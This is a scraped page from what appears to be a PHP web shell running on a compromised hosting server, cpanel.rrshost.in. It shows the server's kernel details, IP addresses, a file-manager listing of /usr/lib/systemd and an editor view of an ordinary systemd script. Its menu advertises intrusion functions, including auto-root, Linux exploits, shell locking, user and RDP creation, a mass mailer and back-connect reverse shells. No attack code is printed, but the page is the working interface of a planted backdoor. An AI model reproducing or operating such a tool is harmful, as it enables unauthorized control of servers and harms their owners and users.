Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 108.162.241.75
138 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
systemd /
[ HOME SHELL ]
Name
Size
Permission
Action
boot
[ DIR ]
drwxr-xr-x
catalog
[ DIR ]
drwxr-xr-x
network
[ DIR ]
drwxr-xr-x
ntp-units.d
[ DIR ]
drwxr-xr-x
system
[ DIR ]
drwxr-xr-x
system-generators
[ DIR ]
drwxr-xr-x
system-preset
[ DIR ]
drwxr-xr-x
system-shutdown
[ DIR ]
drwxr-xr-x
system-sleep
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
user-environment-generators
[ DIR ]
drwxr-xr-x
user-generators
[ DIR ]
drwxr-xr-x
user-preset
[ DIR ]
drwxr-xr-x
libsystemd-shared-249.so
2.71
MB
-rw-r--r--
resolv.conf
710
B
-rw-r--r--
systemd
1.76
MB
-rwxr-xr-x
systemd-ac-power
14.37
KB
-rwxr-xr-x
systemd-backlight
30.29
KB
-rwxr-xr-x
systemd-binfmt
18.37
KB
-rwxr-xr-x
systemd-bless-boot
30.47
KB
-rwxr-xr-x
systemd-boot-check-no-failures
14.37
KB
-rwxr-xr-x
systemd-cgroups-agent
14.29
KB
-rwxr-xr-x
systemd-cryptsetup
58.55
KB
-rwxr-xr-x
systemd-fsck
26.3
KB
-rwxr-xr-x
systemd-fsckd
30.37
KB
-rwxr-xr-x
systemd-growfs
22.37
KB
-rwxr-xr-x
systemd-hibernate-resume
14.29
KB
-rwxr-xr-x
systemd-hostnamed
42.39
KB
-rwxr-xr-x
systemd-initctl
22.37
KB
-rwxr-xr-x
systemd-journald
158.38
KB
-rwxr-xr-x
systemd-localed
50.39
KB
-rwxr-xr-x
systemd-logind
258.51
KB
-rwxr-xr-x
systemd-makefs
14.29
KB
-rwxr-xr-x
systemd-modules-load
18.47
KB
-rwxr-xr-x
systemd-network-generator
34.37
KB
-rwxr-xr-x
systemd-networkd
1.44
MB
-rwxr-xr-x
systemd-networkd-wait-online
34.5
KB
-rwxr-xr-x
systemd-pstore
22.39
KB
-rwxr-xr-x
systemd-quotacheck
14.37
KB
-rwxr-xr-x
systemd-random-seed
22.29
KB
-rwxr-xr-x
systemd-remount-fs
14.29
KB
-rwxr-xr-x
systemd-reply-password
14.29
KB
-rwxr-xr-x
systemd-resolved
478.42
KB
-rwxr-xr-x
systemd-rfkill
22.37
KB
-rwxr-xr-x
systemd-shutdown
46.38
KB
-rwxr-xr-x
systemd-sleep
26.37
KB
-rwxr-xr-x
systemd-socket-proxyd
30.38
KB
-rwxr-xr-x
systemd-sulogin-shell
14.29
KB
-rwxr-xr-x
systemd-sysctl
22.47
KB
-rwxr-xr-x
systemd-sysv-install
1.33
KB
-rwxr-xr-x
systemd-time-wait-sync
14.29
KB
-rwxr-xr-x
systemd-timedated
46.39
KB
-rwxr-xr-x
systemd-timesyncd
54.22
KB
-rwxr-xr-x
systemd-udevd
1.08
MB
-rwxr-xr-x
systemd-update-utmp
18.37
KB
-rwxr-xr-x
systemd-user-runtime-dir
22.29
KB
-rwxr-xr-x
systemd-user-sessions
14.29
KB
-rwxr-xr-x
systemd-veritysetup
22.4
KB
-rwxr-xr-x
systemd-volatile-root
18.29
KB
-rwxr-xr-x
systemd-xdg-autostart-conditio...
14.29
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : systemd-sysv-install
#!/bin/sh # This script is called by "systemctl enable/disable" when the given unit is a # SysV init.d script. It needs to call the distribution's mechanism for # enabling/disabling those, such as chkconfig, update-rc.d, or similar. This # can optionally take a --root argument for enabling a SysV init script # in a chroot or similar. set -eu usage() { echo "Usage: $0 [--root=path] enable|disable|is-enabled <sysv script name>" >&2 exit 1 } ROOT= # parse options eval set -- "$(getopt -o r: --long root: -- "$@")" while true; do case "$1" in -r|--root) ROOT="$2" shift 2 ;; --) shift ; break ;; *) usage ;; esac done NAME="${2:-}" run() { if [ -n "$ROOT" ] && [ "$ROOT" != "/" ]; then _SKIP_SYSTEMD_NATIVE=1 chroot "$ROOT" /usr/sbin/update-rc.d "$@" else _SKIP_SYSTEMD_NATIVE=1 /usr/sbin/update-rc.d "$@" fi } [ -n "$NAME" ] || usage case "$1" in enable) # call the command to enable SysV init script $NAME here.. run "$NAME" defaults run "$NAME" enable ;; disable) run "$NAME" defaults run "$NAME" disable ;; is-enabled) # exit with 0 if $NAME is enabled, non-zero if it is disabled ls "$ROOT"/etc/rc[S5].d/S??"$NAME" >/dev/null 2>&1 ;; *) usage ;; esac
Close